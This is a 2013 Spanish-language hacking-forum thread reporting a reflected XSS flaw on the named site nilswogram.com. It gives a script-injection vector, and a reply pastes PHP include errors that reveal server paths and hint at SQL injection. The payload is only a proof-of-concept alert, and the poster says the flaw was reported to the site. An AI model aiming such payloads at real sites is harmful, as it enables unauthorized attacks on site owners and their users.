[Reflected XSS] Nilswogram.com

Iniciado por F0M3T, Abril 07, 2013, 09:40:07 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Abril 07, 2013, 09:40:07 PM Ultima modificación: Enero 08, 2015, 02:34:27 PM por Expermicid
Url: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Url afectado: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: "><script>alert(/F0M3T - UNDERC[0]DE/);</script>
Imagen:


Reportado: Sí.

Tener éxito no es aleatorio, es una variable dependiente del esfuerzo.
Abril 08, 2013, 10:10:37 AM #1
Creo que también tenga SQLi, mira:
URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Respuesta:
CitarWarning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Compruébalo por favor y repórtalo si eso...
Saludos ((:
Contacto: @migueljimeno96 -
Abril 08, 2013, 05:15:25 PM #2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Creo que también tenga SQLi, mira:
URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Respuesta:
CitarWarning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Compruébalo por favor y repórtalo si eso...
Saludos ((:
Sí me percaté de esa vulnerabilidad, pero no se puede explotar, gracias por la aclaración.
Saludos.
Tener éxito no es aleatorio, es una variable dependiente del esfuerzo.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario